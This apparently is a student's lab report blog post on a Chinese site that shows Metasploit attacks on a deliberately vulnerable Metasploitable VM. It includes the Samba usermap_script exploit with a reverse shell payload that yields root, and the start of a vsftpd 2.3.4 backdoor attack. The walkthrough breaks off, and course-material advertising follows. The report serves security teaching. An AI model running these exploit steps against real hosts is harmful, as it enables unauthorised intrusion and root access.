20232803 2023-2024-2 《网络攻防实践》实践七报告(1)

最新推荐文章于 2024-07-11 03:29:05 发布
最新推荐文章于 2024-07-11 03:29:05 发布
阅读量877 收藏 19
点赞数 28
分类专栏: 程序员 文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969291/article/details/138931916
版权

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

本次实践使用的攻击机和靶机如下表所示

虚拟机类别虚拟机名称IP地址
攻击机Kali192.168.200.3
靶机Metasploitable_ubuntu192.168.200.123

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

  • 在Kali中输入msfconsole命令启动Metasploit

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块

  • 先使用search命令搜索usermap_script渗透攻击模块
    在这里插入图片描述
  • 根据搜索结果,输入use exploit/multi/samba/usermap_script命令使用该模块
    在这里插入图片描述

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可)

  • 先使用命令show payloads查看攻击载荷
    在这里插入图片描述
  • 使用命令set payload cmd/unix/reverse将远程Shell作为攻击载荷
    在这里插入图片描述

④设置渗透攻击参数(RHOST,LHOST,TARGET等)

  • 输入命令show options显示渗透攻击参数
    在这里插入图片描述
  • 输入set LHOST 192.168.200.3LHOST设置为攻击机Kali的IP
  • 输入set RHOST 192.168.200.123RHOST设置为靶机Metasploitable_ubuntu的IP
    在这里插入图片描述
  • 再次输入命令show options显示渗透攻击参数,查看参数是否设置成功
    在这里插入图片描述
    根据显示的参数可知,已设置成功

⑤执行渗透攻击

  • 输入命令exploit实施攻击
    在这里插入图片描述

⑥查看是否正确得到远程Shell,并查看获得的权限

  • 输入命令ifconfig查看IP地址
    在这里插入图片描述
    可知此时的IP地址为192.168.200.123,确定获得了靶机的Shell,攻击成功
  • 再输入whoami命令,查看权限
    在这里插入图片描述
    显然,我们获得了root权限
2.2 实践作业:攻防对抗实践
①攻击实验
虚拟机分类虚拟机名称IP
攻击机(吴锦龙20232803)Kali172.20.10.4
靶机(张哲20232807)Metasploitable_ubuntu172.20.10.5
  • 在Kali中输入命令sudo nmap -sV 172.20.10.5使用namp进行探测
    在这里插入图片描述
    我们可以看到21号端口上运行的是vsftpd 2.3.4版本的ftp服务
  • 输入msfconsole命令启动Metasploit
    在这里插入图片描述
  • 输入命令search vsftpd搜索是否有关于vsftpd的模块
    在这里插入图片描述
    可以看到图中第二个模块即为vsftpd 2.3.4版本相应的模块
  • 输入命令use exploit/unix/ftp/vsftpd_234_backdoor来使用该模块
    在这里插入图片描述
  • 输入命令show payloads查看攻击载荷

在这里插入图片描述

  • 设置攻击载荷
    在这里插入图片描述
  • 输入命令show options显示需要设置的参数
    在这里插入图片描述

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84969291
关注
  • 28
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
华中科技大学网络攻防实践相关
02-14
华中科技大学网络攻防实践相关
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-02 1043
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。在攻击前,打开Kali的Wireshark进行抓包,攻击完成后,在Wireshark中输入。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-03 817
在分析网络数据源的过程中,面对大量的数据,我学会了如何筛选和识别关键信息,通过对数据包的深入分析,我能够理解攻击者的策略和行为模式。在筛选后的数据包中发现只有NBNS包,NBNS是网络基本输入/输出系统(NetBIOS)的一部分,主要负责在基于NetBIOS名称访问的网络上提供主机名和地址映射服务。如上图所示,前面的字符串都是一些乱码,而最后出现了两个dll文件和三个没有文件名后缀的文件,根据这三个文件的文件名,猜测是程序或函数。在筛选后的数据包中只有一些TCP三次握手过程的数据包,没有数据的交互。
20232803 2023-2024-2 《网络攻防实践实践6报告
weixin_46701653的博客
04-27 990
答:攻击者首先通过Unicode漏洞对目标主机进行了信息搜集,掌握了操作系统的基本情况。通过这一系列复杂的操作,攻击者最终成功地获得了系统的访问权限,并为自己创建了一个具有高权限的用户账户,从而实现了对目标系统的控制。答:在成功获取系统权限后,攻击者继续尝试提升权限。答:攻击者对Unicode漏洞使用了Unicode攻击,并对msadcs.dll的RDS漏洞使用msadc.pl渗透工具进行攻击。答:是的,后面攻击者已经发现了他的目标是一台蜜罐主机,并在rfp.txt文件中称这是他见过的最好的蜜罐主机。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-23 828
对于SQL注入和XSS攻击,以前只是了解但还未实践过,这一次的实践让我对它们有了直观的感受。SQL注入漏洞让用户可以随意的操作数据库进行增删改查,XSS蠕虫更是能够自我传播。这两个漏洞都是因为没有对用户输入的数据进行校验导致的,因此在开发阶段就应注意这些安全隐患。好在现如今许多开发框架都已替我们考虑到了这些安全漏洞,现在很少有网站存在SQL注入漏洞和XSS漏洞了。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
04-18 976
本次实践主要学习防火墙、IDS、IPS的运行机制、原理以及配置规则等内容。通过防火墙和入侵检测,可以获取攻击者的攻击行为。防火墙和入侵检测有助于防御者采取针对性的防御措施,以最小的成本应对最大程度的威胁。蜜网网关拥有较为完善的防御机制,通过使用没有任何防御措施的蜜罐主机,诱导攻击者进入“圈套”。防御者通过观察攻击者对蜜罐主机的攻击,可以总结出攻击者的攻击手段和方法。
20232803 2023-2024-2 《网络攻防实践实践报告(2)
2401_84969310的博客
05-16 645
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
20232803 2023-2024-2 《网络攻防实践实践报告(3)
2401_84969310的博客
05-11 924
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
04-04 670
指攻击者伪装成路由器发送虚假的ICMP路由路径控制报文,使得受害主机选择攻击者指定的路由路径,从而进行嗅探或假冒攻击的一种技术。在本次实验中,应用netwox工具进行了ARP欺骗攻击、ICMP路由重定向攻击、SYN Flood攻击、TCP RST 攻击和TCP会话劫持,并初步了解了netwox、ettercap等工具的使用,为今后进一步深入了解和实践网络协议攻击奠定了基础。基于TCP三次握手的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,消耗目标主机的连接队列资源,从而无法正常服务。
20232803 2023-2024-2 《网络攻防实践实践十一报告
weixin_46701653的博客
05-30 877
这次实践的内容与网页木马相关,这与我们的日常生活还是比较接近的。我在实践中进行了渗透攻击,也对网页木马进行了分析。在攻防对抗实践中,还用到了社会工程学攻击:通过设计一封迷惑人的邮件,诱使防守方点击钓鱼链接,以实现对其终端的控制,这一过程还是挺有趣的,这也让我意识到不要随意点击来历不明的链接。
网络攻防技术实践-防火墙.doc
05-12
网络安全实验
网络攻防实践报告1
08-03
1.1 需求分析 4 1.2 系统架构 4 1.3 漏洞设计 5 1.4 页面展示 6 2.1 文件包含漏洞 7 2.1.1 漏洞复现 7 2.1.2 代码分析
网络攻防技术实践-NIDS.doc
05-12
网络安全技术实验
从零开始做题:logtime
weixin_44626085的博客
07-10 239
给出1个pcapng文件。
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 633
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
最新发布
Snu77的博客
07-11 9682
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢复在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实现优于最新技术(State-of-The-Art, SOTA)
Zabbix自动发现
Lzcsfg的博客
07-08 753
在 Zabbix 中,自动发现(Auto Discovery)是一种强大的功能,用于自动识别和监控网络设备、服务或应用程序中的动态变化。通过自动发现功能,Zabbix 可以自动添加、配置和监控新的网络节点或服务,大大简化了管理和监控大规模环境的复杂性。
2021实战攻防企业红蓝对抗实践指南-长亭.pdf
07-17
《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份关于红蓝对抗实践的指南文件。红蓝对抗是一种模拟真实攻击和防御的方法,旨在测试企业的安全性能和发现潜在漏洞。 该指南首先介绍了红蓝对抗实践的基本概念和目标。红队代表攻击方,利用各种技术手段和策略试图入侵企业系统,而蓝队则代表防御方,负责检测和阻止攻击,并进行相应的应对和修复措施。 接下来,指南详细解释了红蓝对抗实践的步骤和流程。其中包括情报收集,攻击路径规划,漏洞利用,权限提升,数据抓取等环节,通过逐步深入渗透,验证企业的安全性。 在红蓝对抗实践中,指南还提供了一些常用的攻击技术和实用工具的介绍,如渗透测试工具、漏洞扫描工具和安全分析工具等。同时,还给出了常见的安全防御策略和技术建议,如强化访问控制,加强日志监控和事件响应能力等。 此外,指南还强调了红蓝对抗实践的重要性,并提供了一些实战案例和经验分享,帮助企业更好地理解和应用红蓝对抗技术,提升自身的网络安全防御水平。 总之,《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份全面而实用的红蓝对抗实践指南,对于希望提升网络安全能力的企业和安全从业人员来说,具有很高的参考价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值